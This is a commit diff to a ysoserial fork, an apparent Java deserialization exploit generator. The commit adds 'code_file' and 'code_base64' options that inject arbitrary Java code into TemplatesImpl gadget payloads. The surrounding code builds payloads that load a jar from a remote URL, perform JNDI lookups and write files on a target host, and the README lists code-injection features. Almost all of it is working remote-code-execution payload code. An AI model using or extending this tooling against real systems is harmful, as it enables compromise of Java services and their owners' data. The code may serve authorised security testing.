添加code_file,code_base64命令

README.md

@@ -15,6 +15,8 @@
 - [ ] auto_cmd  自动判断操作系统执行命令
 - [ ] class_file 注入class文件，执行class代码
 - [ ] class_base64 注入class base64编码内容，执行class代码
+- [ ] code_file 注入要执行的代码
+- [ ] code_base64 注入要执行代码的base64编码
 - [ ] bcel 注入bcel字符串，实现代码执行
 - [ ] bcel_class_file 通过文件注入
 - [ ] script_file 通过js引擎执行代码

pom.xml

@@ -4,7 +4,7 @@
 
 	<groupId>me.gv7.woodpecker</groupId>
 	<artifactId>ysoserial-for-woodpecker</artifactId>
-	<version>0.3.1</version>
+	<version>0.3.2</version>
 	<packaging>jar</packaging>
 
 	<name>ysoserial</name>

src/main/java/me/gv7/woodpecker/yso/payloads/custom/CustomCommand.java

@@ -10,6 +10,8 @@ public class CustomCommand {
     public final static String COMMAND_AUTO_CMD = "auto_cmd:";
     public final static String COMMAND_CLASS_FILE = "class_file:";
     public final static String COMMAND_CLASS_BASE64 = "class_base64:";
+    public final static String COMMAND_CODE_FILE = "code_file:";
+    public final static String COMMAND_CODE_BASE64 = "code_base64:";
     public final static String COMMAND_BCEL = "bcel:";
     public final static String COMMAND_BCEL_CLASS_FILE = "bcel_class_file:";
     public final static String COMMAND_SCRIPT_FILE = "script_file:";

src/main/java/me/gv7/woodpecker/yso/payloads/custom/TemplatesImplUtil.java

@@ -86,22 +86,28 @@ public static String getCmd(String command) throws Exception {
             byte[] fileContent = new BASE64Decoder().decodeBuffer(fileBase64Content);
             String fileByteCode = CommonUtil.byteToByteArrayString(fileContent);
             cmd = String.format("new java.io.FileOutputStream(\"%s\").write(new byte[]{%s});",remoteFilePath,fileByteCode);
-        } else if (command.toLowerCase().contains(CustomCommand.COMMAND_LOADJAR)){
+        } else if (command.toLowerCase().startsWith(CustomCommand.COMMAND_LOADJAR)){
             String cmdInfo = command.substring(CustomCommand.COMMAND_LOADJAR.length());
             String jarpath = cmdInfo.split("\\|")[0];
             String className = cmdInfo.split("\\|")[1];
             cmd = String.format("java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"%s\")});" +
                 "classLoader.loadClass(\"%s\").newInstance();",jarpath,className);
-        } else if(command.toLowerCase().contains(CustomCommand.COMMAND_LOADJAR_WITH_ARGS)) {
+        } else if(command.toLowerCase().startsWith(CustomCommand.COMMAND_LOADJAR_WITH_ARGS)) {
             String cmdInfo = command.substring(CustomCommand.COMMAND_LOADJAR_WITH_ARGS.length());
             String jarpath = cmdInfo.split("\\|")[0];
             String className = cmdInfo.split("\\|")[1];
             String args = cmdInfo.split("\\|")[2];
             cmd = String.format("java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"%s\")});" +
                 "classLoader.loadClass(\"%s\").getConstructor(String.class).newInstance(\"%s\");",jarpath,className,args);
-        } else if (command.toLowerCase().contains(CustomCommand.COMMAND_JNDI)){
+        } else if (command.toLowerCase().startsWith(CustomCommand.COMMAND_JNDI)){
             String jndiURL = command.substring(CustomCommand.COMMAND_JNDI.length());
             cmd = String.format("new javax.naming.InitialContext().lookup(\"%s\");",jndiURL);
+        } else if(command.toLowerCase().startsWith(CustomCommand.COMMAND_CODE_FILE)){
+            String codeFile = command.substring(CustomCommand.COMMAND_CODE_FILE.length());
+            cmd = new String(CommonUtil.readFileByte(codeFile));
+        } else if(command.toLowerCase().startsWith(CustomCommand.COMMAND_CODE_BASE64)){
+            String codeBase64 = command.substring(CustomCommand.COMMAND_CODE_BASE64.length());
+            cmd = new String(new BASE64Decoder().decodeBuffer(codeBase64));
         } else {
             throw new Exception(String.format("Command [%s] not supported",command));
         }

src/test/java/Test.src

@@ -0,0 +1 @@
+System.out.println("xsd");